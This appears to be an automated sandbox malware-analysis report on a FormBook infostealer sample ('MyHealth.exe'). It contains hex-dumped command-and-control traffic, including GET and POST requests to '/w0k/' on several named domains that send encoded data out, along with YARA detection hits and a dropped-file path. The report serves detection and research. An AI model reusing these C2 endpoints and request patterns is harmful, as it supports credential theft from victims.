5a 54 51 58 67 49 68 77 65 6a 4e 79 6f 77 67 39 55 54 47 77 4f 54 58 34 50 4f 79 59 39 34 48 7a 45 48 6d 6f 35 77 54 51 36 33 57 63 42 37 35 41 37 41 68 6b 77 5a 2d 47 6d 68 47 33 48 52 69 63 74 59 74 47 54 64 34 78 33 6f 78 72 4e 73 2d 68 35 5a 35 42 43 38 73 73 35 45 30 31 55 48 42 62 32 65 42 55 45 65 35 57 43 42 75 6f 66 4b 67 4c 4e 6a 4b 74 6d 64 54 75 63 4c 74 57 78 35 74 48 55 72 5f 61 62 61 74 4c 6e 59 69 28 37 63 67 67 4b 52 30 67 5a 63 76 48 43 43 52 49 39 64 57 69 58 37 6f 56 65 66 69 79 6d 45 6a 68 31 63 32 4d 5f 32 72 72 41 51 4e 28 54 6e 76 58 67 61 56 43 30 6b 54 28 7a 48 46 69 75 51 78 78 44 34 2d 69 74 62 51 52 6d 4a 34 48 54 37 38 66 54 74 31 79 71 73 30 6c 33 73 59 4b 37 51 54 70 34 6e 57 30 65 65 64 75 44 55 78 58 4c 53 32 44 4d 46 61 50 53 75 70 32 39 65 50 36 4f 57 35 4b 47 39 45 54 30 61 69 46 74 59 61 4b 33 30 63 70 61 54 55 4b 4f 48 6b 68 44 79 52 42 2d 68 67 35 6d 49 4c 76 37 78 78 45 7a 4f 45 58 4b 69 44 7a 57 7a 75 49 53 73 76 4e 39 61 79 44 5a 43 6c 68 73 52 57 78 75 39 2d 37 34 57 67 6f 31 62 57 4d 67 70 76 32 57 55 6d 61 74 75 38 76 38 54 54 72 64 38 51 4b 5f 6d 58 39 46 61 32 51 79 36 63 7a 62 35 4b 55 64 66 6f 7a 74 63 7a 4e 44 7a 38 76 49 6f 6d 56 6a 51 31 28 32 6e 72 6c 4f 6f 6c 7a 4e 33 4c 63 73 52 69 7a 44 6c 4c 58 6e 6f 4e 36 65 51 32 38 78 62 2d 48 5f 53 5a 7a 54 63 52 46 48 71 52 7e 48 74 79 49 5f 4a 59 34 4d 55 32 46 36 28 38 47 4b 7e 70 70 68 77 42 77 55 51 44 73 6b 6c 4f 76 44 77 68 7a 37 31 71 6d 64 37 41 33 58 53 4f 5a 46 62 5f 52 54 52 77 63 7a 4d 68 6c 49 54 4f 6f 69 70 46 4b 55 4c 62 67 36 62 42 36 55 75 75 30 41 6e 55 4e 63 34 77 6b 41 7a 67 41 71 64 77 43 67 55 6f 58 59 39 76 78 39 64 31 4
 Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1Host: www.nacemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: doc-0k-3c-docs.googleusercontent.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Mar 2020 13:10:49 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 404 Not Found

nginx
 Urls found in memory or binary data Show sources
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752 Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737 Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443

#### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY

#### System Summary:

 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Potential malicious icon found Show sources
 Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A408A 2_3_000A408A Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A52F2 2_3_000A52F2 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A7460 2_3_000A7460 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_3_000A25C4 2_3_000A25C4 Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_2_1F5C1FCE 2_2_1F5C1FCE Source: C:\Users\user\Desktop\MyHealth.exe Code function: 2_2_1F525E70 2_2_1F525E70 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F491746 16_2_1F491746 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F491FCE 16_2_1F491FCE Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3E5790 16_2_1F3E5790 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F482782 16_2_1F482782 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F48CE66 16_2_1F48CE66 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F6611 16_2_1F3F6611 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F5E70 16_2_1F3F5E70 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F4E61 16_2_1F3F4E61 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3E7640 16_2_1F3E7640 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4926F8 16_2_1F4926F8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F483E96 16_2_1F483E96 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3E1530 16_2_1F3E1530 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3A9528 16_2_1F3A9528 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F492519 16_2_1F492519 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F481D1B 16_2_1F481D1B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F46C53F 16_2_1F46C53F Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3C0D40 16_2_1F3C0D40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F48D5D2 16_2_1F48D5D2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F47FDDB 16_2_1F47FDDB Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F471DE3 16_2_1F471DE3 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F48E581 16_2_1F48E581 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F46E58A 16_2_1F46E58A Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3E1410 16_2_1F3E1410 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3D740C 16_2_1F3D740C Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F547E 16_2_1F3F547E Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F47F42B 16_2_1F47F42B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F48DCC5 16_2_1F48DCC5 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4844EF 16_2_1F4844EF Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F492C9A 16_2_1F492C9A Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F491C9F 16_2_1F491C9F Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F483490 16_2_1F483490 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3A3314 16_2_1F3A3314 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3EFB40 16_2_1F3EFB40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F4B96 16_2_1F3F4B96 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3CEBE0 16_2_1F3CEBE0 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F63C2 16_2_1F3F63C2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F523D 16_2_1F3F523D Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F480A02 16_2_1F480A02 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F49E214 16_2_1F49E214 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F4A5B 16_2_1F3F4A5B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3E42B0 16_2_1F3E42B0 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4922DD 16_2_1F4922DD Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F491A99 16_2_1F491A99 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F7110 16_2_1F3F7110 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F419906 16_2_1F419906 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F594B 16_2_1F3F594B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4861DF 16_2_1F4861DF Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4919E2 16_2_1F4919E2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F6180 16_2_1F3F6180 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F49D9BE 16_2_1F49D9BE Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F0021 16_2_1F3F0021 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3FE020 16_2_1F3FE020 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F9810 16_2_1F3F9810 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F1070 16_2_1F3F1070 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F48D016 16_2_1F48D016 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4928E8 16_2_1F4928E8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3DA080 16_2_1F3DA080 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F4718B6 16_2_1F4718B6 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 16_2_1F3F48CB 16_2_1F3F48CB Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F491746 17_2_1F491746 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F491FCE 17_2_1F491FCE Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3E5790 17_2_1F3E5790 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F482782 17_2_1F482782 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F48CE66 17_2_1F48CE66 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F6611 17_2_1F3F6611 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F5E70 17_2_1F3F5E70 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F4E61 17_2_1F3F4E61 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3E7640 17_2_1F3E7640 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4926F8 17_2_1F4926F8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F483E96 17_2_1F483E96 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3E1530 17_2_1F3E1530 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3A9528 17_2_1F3A9528 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F492519 17_2_1F492519 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F481D1B 17_2_1F481D1B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F46C53F 17_2_1F46C53F Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3C0D40 17_2_1F3C0D40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F48D5D2 17_2_1F48D5D2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F47FDDB 17_2_1F47FDDB Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F471DE3 17_2_1F471DE3 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F48E581 17_2_1F48E581 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F46E58A 17_2_1F46E58A Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3E1410 17_2_1F3E1410 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3D740C 17_2_1F3D740C Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F547E 17_2_1F3F547E Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F47F42B 17_2_1F47F42B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F48DCC5 17_2_1F48DCC5 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4844EF 17_2_1F4844EF Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F492C9A 17_2_1F492C9A Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F491C9F 17_2_1F491C9F Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F483490 17_2_1F483490 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3A3314 17_2_1F3A3314 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3EFB40 17_2_1F3EFB40 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F4B96 17_2_1F3F4B96 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3CEBE0 17_2_1F3CEBE0 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F63C2 17_2_1F3F63C2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F523D 17_2_1F3F523D Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F480A02 17_2_1F480A02 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F49E214 17_2_1F49E214 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F4A5B 17_2_1F3F4A5B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3E42B0 17_2_1F3E42B0 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4922DD 17_2_1F4922DD Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F491A99 17_2_1F491A99 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F7110 17_2_1F3F7110 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F419906 17_2_1F419906 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F594B 17_2_1F3F594B Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4861DF 17_2_1F4861DF Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4919E2 17_2_1F4919E2 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F6180 17_2_1F3F6180 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F49D9BE 17_2_1F49D9BE Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F0021 17_2_1F3F0021 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3FE020 17_2_1F3FE020 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F9810 17_2_1F3F9810 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F1070 17_2_1F3F1070 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F48D016 17_2_1F48D016 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4928E8 17_2_1F4928E8 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3DA080 17_2_1F3DA080 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F4718B6 17_2_1F4718B6 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: 17_2_1F3F48CB 17_2_1F3F48CB
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F444F10 appears 50 times Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F41DDE8 appears 86 times Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F455110 appears 76 times Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe Code function: String function: 1F3CB0E0 appears 352 times Source: C:\Users\user\Desktop\MyHealth.exe Code function: String function: 000F63EC appears 62 times
 PE file contains strange resources Show sources
 Source: MyHealth.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
